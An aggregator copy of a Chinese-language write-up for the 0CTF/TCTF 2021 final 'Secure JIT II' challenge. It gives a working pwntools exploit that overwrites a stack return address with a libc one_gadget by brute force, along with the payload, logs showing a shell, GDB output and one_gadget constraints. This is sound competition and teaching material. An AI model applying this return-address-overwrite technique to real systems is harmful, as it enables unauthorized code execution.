0CTF / TCTF 2021 final - Secure JIT II
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/09/28/jit/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
0CTF / TCTF 2021 final - Secure JIT II
发表于 2021-09-28
| 分类于 CTF/Pwn
和xkt共同完成,题目是一个用python3运行的简易python解释器,可以任意地址写,读内存的功能被patch了。比赛时因为没发现ubuntu18.04默认的python3是没开PIE且GOT表可写的,所以采取了野蛮的解法:任意地址写,可以泄露栈地址,所以直接写栈上的main函数返回地址为one_gadget,复用main函数返回到的libc_start_main地址的高字节,写低三字节,需要爆破1.5字节,概率为1/4096。
本地exp如下,仅限ubuntu18.04,不太稳定,可能需要多次运行:
from pwn import *
payload = '''
def f():
b = array(16)
a = b + 2219
a[0] = 0xaec41c * 0x100000 * 0x100000
'''
f = open("payload",'w')
f.write(payload)
f.close()
while(1):
try:
io = process(["python3","pyast64.py","payload"])
io.sendline("ls");io.recv()
io.sendline("ls");io.recv()
io.sendline("ls");io.recv()
break
except:
io.close()
io.interactive()
1/4096,比较看人品,比赛时候远程5分钟就出了:
➜ python exp.py
[+] Starting local process '/usr/bin/python3': pid 61825
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61825)
[+] Starting local process '/usr/bin/python3': pid 61835
[*] Stopped process '/usr/bin/python3' (pid 61835)
[+] Starting local process '/usr/bin/python3': pid 61855
[*] Stopped process '/usr/bin/python3' (pid 61855)
[+] Starting local process '/usr/bin/python3': pid 61863
[*] Process '/usr/bin/python3' stopped with exit code -6 (SIGABRT) (pid 61863)
[+] Starting local process '/usr/bin/python3': pid 61871
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61871)
[+] Starting local process '/usr/bin/python3': pid 61879
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61879)
[+] Starting local process '/usr/bin/python3': pid 61887
[*] Stopped process '/usr/bin/python3' (pid 61887)
[+] Starting local process '/usr/bin/python3': pid 61895
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61895)
[+] Starting local process '/usr/bin/python3': pid 61903
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61903)
[+] Starting local process '/usr/bin/python3': pid 61911
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61911)
[+] Starting local process '/usr/bin/python3': pid 61919
[*] Stopped process '/usr/bin/python3' (pid 61919)
[+] Starting local process '/usr/bin/python3': pid 61927
[*] Switching to interactive mode
core entry exp.py flag libc-2.27.so payload payloadback pyast64.py test
$
gdb环境稳定getshell:
➜ cat payload
def f():
b = array(16)
a = b + 2219
a[0] = 0xaec41c * 0x100000 * 0x100000
➜ gdb -q --args python3 pyast64.py payload
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.1.1 using Python engine 3.6
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from python3...(no debugging symbols found)...done.
gef➤ r
Starting program: /usr/bin/python3 pyast64.py payload
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
jit return: 0
process 46700 is executing new program: /bin/dash
$ ls
core entry exp.py flag libc-2.27.so payload pyast64.py
$
只有0x10a41c这个gadget满足要求:
➜ one_gadget libc-2.27.so
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
python3没开PIE:
➜ cat /proc/version
Linux version 4.15.0-158-generic (buildd@lgw01-amd64-051)
(gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04))
#166-Ubuntu SMP Fri Sep 17 19:37:52 UTC 2021
➜ checksec `which python3`
[*] '/usr/bin/python3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK